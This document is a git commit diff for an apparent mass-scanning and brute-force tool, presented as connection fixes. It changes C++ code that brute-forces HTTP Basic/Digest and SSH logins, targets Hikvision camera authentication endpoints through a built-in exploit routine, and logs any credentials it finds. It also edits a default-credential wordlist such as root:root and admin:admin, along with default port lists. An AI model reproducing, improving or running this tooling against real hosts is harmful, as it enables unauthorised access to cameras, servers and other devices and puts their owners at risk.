Multiple connection issues fixes.

This commit is contained in:
cora32 2015-04-30 22:21:12 +03:00
parent 7f363c4d48
commit 93e4f2e141
10 changed files with 80 additions and 93 deletions

View File

@ -47,15 +47,19 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode
return 0;
}
lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::string *buff) {
lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
string lpString;
lopaStr lps = {"UNKNOWN", "", ""};
int passCounter = 0;
int res = 0;
int isDig = Utils::isDigest(buff);
std::string buff;
Connector con;
Sleep(1000);
con.nConnect(ip, port, &buff);
int isDig = Utils::isDigest(&buff);
if (isDig == -1) {
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 detected - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a></span>");
strcpy(lps.login, "");
return lps;
@ -63,14 +67,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
else if (isDig == 1) {
if (digestMode != true) {
digestMode = true;
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a>");
}
}
else {
if (digestMode != false) {
digestMode = false;
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "/\">" +
stt->doEmitionRedFoundData("Digest selector mismatch - <a style=\"color:orange;\" href=\"http://" + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + "/\">" +
QString(ip) + ":" + QString::number(port) + "</a>");
};
}
@ -78,9 +82,9 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
std::string buffer;
if (commenceHikvisionEx1(ip, port, digestMode)) {
stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
QString(ip) + ":" +
QString::number(port) + ")");
//stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" +
// QString(ip) + ":" +
// QString::number(port) + ")");
strcpy(lps.login, "anonymous");
strcpy(lps.pass, "\177\177\177\177\177\177");
return lps;
@ -124,14 +128,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::
return lps;
}
lopaStr BA::BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer) {
lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) {
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
++baCount;
++BrutingThrds;
const lopaStr &lps = BABrute(ip, port, digestMode, buffer);
const lopaStr &lps = BABrute(ip, port, digestMode);
--BrutingThrds;
return lps;

View File

@ -8,11 +8,11 @@
class BA {
private:
static lopaStr BABrute(const char *ip, const int port, bool digestMode, const std::string *buffer);
static lopaStr BABrute(const char *ip, const int port, bool digestMode);
public:
static int checkOutput(const string *buffer, const char *ip, const int port);
static lopaStr BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer);
static lopaStr BALobby(const char *ip, const int port, bool digestMode);
};
#endif // BASICAUTH_H

View File

@ -161,11 +161,8 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer);
int proxyPort = std::atoi(gProxyPort);
if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
}
else curl_easy_setopt(curl, CURLOPT_PROXY, "");
if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3);
@ -200,8 +197,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer,
else res = curl_easy_perform(curl);
int sz = buffer->size();
if (res == CURLE_OK ||
(port == 21 && sz > 0)) {
if (res == CURLE_OK || (port == 21 && sz > 0)) {
if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str()));
Activity += sz;

View File

@ -4,7 +4,6 @@
int _sshConnect(const char *user, const char *pass, const char *host, int port) {
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L);
char hostStr[128] = {0};
ZeroMemory(hostStr, sizeof(hostStr));
strcpy(hostStr, user);
@ -14,6 +13,7 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
if (curl)
{
curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L);
curl_easy_setopt(curl, CURLOPT_URL, host);
curl_easy_setopt(curl, CURLOPT_PORT, port);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
@ -22,23 +22,18 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) {
curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP);
curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort);
} else {
curl_easy_setopt(curl, CURLOPT_PROXY, "");
}
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut);
} else curl_easy_setopt(curl, CURLOPT_PROXY, "");
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, sshTimeout);
curl_easy_setopt(curl, CURLOPT_TIMEOUT, sshTimeout);
curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L);
int res = curl_easy_perform(curl);
socket_t sock;
curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(res != CURLE_OK) {
curl_easy_cleanup(curl);
++ssh;
return -2;
}
if (res != CURLE_OK) {
curl_easy_cleanup(curl);
return -2;
}
socket_t sock = -1;
res = curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock);
if(sock != -1) {
ssh_session ssh_session = ssh_new();
@ -49,13 +44,14 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return -1;
};
ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr);
ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0);
ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout);
//Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700
res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock);
res = ssh_connect(ssh_session);
if (res != SSH_OK) //Offline
@ -88,22 +84,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port)
return 0;
}
char _get_ssh_banner(const char *ip, int port) {
char recvBuff[256] = {0};
std::string buffer;
Connector con;
con.nConnect(ip, port, &buffer);
int sz = buffer.size();
if(sz != 0)
{
strncpy(recvBuff, buffer.c_str(), sz < 256 ? sz : 256);
};
return *recvBuff;
}
int check_ssh_pass(const char *user, const char *pass,
const char *userPass, const char *host, int port,
std::string *buffer, const char *banner) {
@ -166,24 +146,25 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner
return -1;
}
QString strIP;
QString strPort;
int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer)
{
if(gMaxBrutingThreads > 0) {
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
const char &banner = _get_ssh_banner(ip, port);
if(strlen(&banner) > 0)
std::string sshBanner;
Connector con;
con.nConnect(ip, port, &sshBanner);
if (strlen(sshBanner.c_str()) > 0)
{
//BruteUtils::BConInc();
++BrutingThrds;
int res = SSHBrute(ip, port, buffer, &banner);
int res = SSHBrute(ip, port, buffer, sshBanner.c_str());
--BrutingThrds;
//BruteUtils::BConDec();
return res;
};
return -1;
} else return -1;
}
}
return -1;
}

View File

@ -1227,13 +1227,12 @@ int _specBrute(const char *ip, int port,
{
const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(),
port,
(strcmp(comment, "[DIGEST]") == 0 ? true : false),
buffer);
(strcmp(comment, "[DIGEST]") == 0 ? true : false));
if (strcmp(lps.other, "404") == 0) {
stt->doEmitionRedFoundData("BA - 404 <a style=\"color:#717171;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + QString(path) + "/\">" +
QString(ip) + ":" + QString::number(port) + QString(path) + "</a>");
QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + "</a>");
return -1;
}
@ -2512,8 +2511,8 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
}
else if (flag == 34) //Hikvision ip cam
{
if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "Basic Authorization", cp, size, buffcpy) == -1){
_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "Basic Authorization", cp, size, buffcpy);
if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size, buffcpy) == -1){
_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size, buffcpy);
}
}
else if (flag == 35) //EasyCam
@ -2673,7 +2672,7 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex
char log[512] = { 0 };
++AnomC1;
const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false, buffcpy);
const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false);
sprintf(log, "[HFS]:<a href=\"http://%s:%d/\"><span style=\"color: #a1a1a1;\">%s:%d</span></a><font color=\"#0084ff\"> T: </font><font color=\"#ff9600\">%s Pass: %s:%s</font>",
ip, port, ip, port, finalstr, lps.login, lps.pass);

View File

@ -1,3 +1,6 @@
ssl vpn
Ref1=http
hello. goodbye.
Analog Telephone Adapter
IP Dect -
AnyGate

View File

@ -172,7 +172,7 @@ void _LoadPersInfoToLocalVars(int savedTabIndex) {
gMode = 1;
gThreads = ui->lineEditThread->text().toInt();
strcpy(currentIP, ui->lineEditStartIPDNS->text().toLocal8Bit().data());
strcpy(currentIP, ui->dnsLine->text().toLocal8Bit().data());
strcpy(gTLD, ui->lineILVL->text().toLocal8Bit().data());
strncpy(gPorts, ("-p" + ui->dnsPortLine->text()).toLocal8Bit().data(), 65536);
gPorts[ui->dnsPortLine->text().length() + 2] = '\0';
@ -536,7 +536,9 @@ void SetValidators()
QRegExp("([\\d*|.|//|-])+"),
NULL
);
ui->ipLine->setValidator(validator);
validator = new QRegExpValidator(QRegExp("\\d{1,3}"), NULL);
ui->importThreads->setValidator(validator);
ui->threadLine->setValidator(validator);
@ -551,7 +553,7 @@ void SetValidators()
ui->threadDelayBox->setValidator(validator);
validator = new QRegExpValidator(QRegExp("(\\w|-|\\.|\\[|\\]|\\\\)+"), NULL);
ui->lineEditStartIPDNS->setValidator(validator);
ui->dnsLine->setValidator(validator);
validator = new QRegExpValidator(QRegExp("(\\w|-|\\.)+((\\w|-|\\.)+)+"), NULL);
ui->lineILVL->setValidator(validator);
@ -1401,7 +1403,7 @@ void nesca_3::slotSaveImage(QAction *qwe)
{
QString fn = QString::number(QT.msec()) + "_" +
(ME2ScanFlag ? QString("ME2") : QString("Voice")) + "_" +
(ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png";
(ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png";
int ax = 27;
int ay = 2;
int w = ui->graphicLog->width() + 30;
@ -1444,7 +1446,7 @@ void nesca_3::slotSaveImage(QAction *qwe)
{
QString fn = QString::number(QT.msec()) + "_" +
(PieStatFlag ? "PieStat" : "QoS") + "_" +
(ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png";
(ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png";
QPixmap pixmap(ui->graphicLog->width(), ui->graphicLog->height());
QPainter painter(&pixmap);
@ -2094,14 +2096,15 @@ void nesca_3::ConnectEvrthng()
connect ( ui->restoreDefaultPorts1, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->restoreDefaultPorts2, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->restoreDefaultPorts3, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) );
connect ( ui->lineEditStartIPDNS, SIGNAL( textChanged(QString) ), this, SLOT( DNSLine_ValueChanged(QString) ) );
connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->lineEditStartIPDNS, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsLine, SIGNAL(textChanged(QString)), this, SLOT(DNSLine_ValueChanged(QString)));
connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) );
connect ( ui->dnsLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) );
connect ( ui->logoLabel, SIGNAL( clicked() ), this, SLOT( logoLabelClicked() ) );
connect ( ui->me2ScanBut, SIGNAL( clicked() ), this, SLOT( activateME2ScanScene() ) );
connect ( ui->QoSScanBut, SIGNAL( clicked() ), this, SLOT( activateQoSScanBut() ) );
@ -2227,7 +2230,7 @@ void RestoreSession()
qLex.replace("[az]", "\\l");
qLex.replace("[0z]", "\\w");
qLex.replace("[09]", "\\d");
ui->lineEditStartIPDNS->setText(qLex);
ui->dnsLine->setText(qLex);
lex = strtok(NULL, " ");
if(strstr(lex, ".") != NULL) {
strcpy(gTLD, lex);
@ -2722,18 +2725,18 @@ void nesca_3::IPScanSeq()
void nesca_3::DNSScanSeq()
{
if (ui->lineEditStartIPDNS->text() != "")
if (ui->dnsLine->text() != "")
{
if (ui->dnsPortLine->text() != "")
{
if (ui->lineEditStartIPDNS->text().indexOf(".") > 0)
if (ui->dnsLine->text().indexOf(".") > 0)
{
stopFirst = false;
ui->tabMainWidget->setTabEnabled(0, false);
ui->tabMainWidget->setTabEnabled(2, false);
QStringList lst = ui->lineEditStartIPDNS->text().split(".");
ui->lineEditStartIPDNS->setText(lst[0]);
QStringList lst = ui->dnsLine->text().split(".");
ui->dnsLine->setText(lst[0]);
QString topLevelDomainStr;
for (int i = 1; i < lst.size(); ++i)
{
@ -2746,7 +2749,7 @@ void nesca_3::DNSScanSeq()
saveOptions();
stt->setMode(1);
stt->setTarget(ui->lineEditStartIPDNS->text());
stt->setTarget(ui->dnsLine->text());
stt->setPorts(ui->dnsPortLine->text().replace(" ", ""));
stt->start();

View File

@ -190,7 +190,7 @@
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);border:none;</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="maxLength">
<number>4096</number>
@ -398,7 +398,7 @@
<attribute name="title">
<string>DNS Scan</string>
</attribute>
<widget class="QLineEdit" name="lineEditStartIPDNS">
<widget class="QLineEdit" name="dnsLine">
<property name="geometry">
<rect>
<x>110</x>
@ -501,7 +501,7 @@
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="maxLength">
<number>4096</number>
@ -808,7 +808,7 @@ color: rgb(214, 214, 0);</string>
<string notr="true">color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);</string>
</property>
<property name="text">
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21</string>
<string>80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21</string>
</property>
<property name="placeholderText">
<string>80,81,8080,8888,21,6667,7000</string>
@ -3320,7 +3320,7 @@ background-color: #000000;</string>
<tabstop>ipLine</tabstop>
<tabstop>ipmPortLine</tabstop>
<tabstop>threadLine</tabstop>
<tabstop>lineEditStartIPDNS</tabstop>
<tabstop>dnsLine</tabstop>
<tabstop>lineILVL</tabstop>
<tabstop>dnsPortLine</tabstop>
<tabstop>lineEditThread</tabstop>

View File

@ -1,4 +1,5 @@
hw230f8034t:17932yhf823
admin:
root:root
root:admin
admin:admin

View File

@ -1 +1 @@
24B9D-DD
24B9E-852